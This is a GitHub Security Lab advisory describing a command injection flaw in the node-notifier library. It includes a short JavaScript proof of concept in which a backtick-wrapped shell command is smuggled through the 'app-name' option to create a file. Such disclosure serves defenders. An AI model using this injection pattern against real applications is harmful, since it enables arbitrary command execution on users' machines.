April 13, 2021

GHSL-2020-373: Command injection in node-notifier

GitHub Security Lab

Coordinated Disclosure Timeline


node-notifier recently addressed a command injection vulnerability in; however, this fix appears to be insufficient, and command injection through malicious input is still possible.


Tested Version



node-notifier is a general purpose library for showing OS notifications (toasts). A client of the library expects that they can safely call the methods in node-notifier with user-controlled inputs. However, in some cases, that can lead to arbitrary command execution.

Issue 1: Insufficient input sanitization leads to command injection

Certain input fields of node-notifier are insufficiently sanitized and allow for command injection when passed as command line arguments.

The provided PoC pretends to be a client that sends malicious inputs to node-notifier.

The outcome of the PoC is that a file named `exploit` is created in the current working directory.

```javascript
// PoC: a client passing attacker-controlled option values to the notify-send notifier.
const Notify = require("node-notifier/notifiers/notifysend");

var notifier = new Notify({ suppressOsdCheck: true });
var options = {
  title: "titl",
  message: "msg",
  // Array-valued option. Backticks around `touch exploit` are assumed here: they are
  // the shell command substitution that creates the file described above.
  "app-name": ["foo`touch exploit`"]
  //"category": ["foo`touch exploit`"]
};
notifier.notify(options, () => {});
```


Arbitrary command execution



This issue was discovered and reported by GitHub team member @erik-krogh.


You can contact the GHSL team at, please include GHSL-2020-373 in any communication regarding this issue.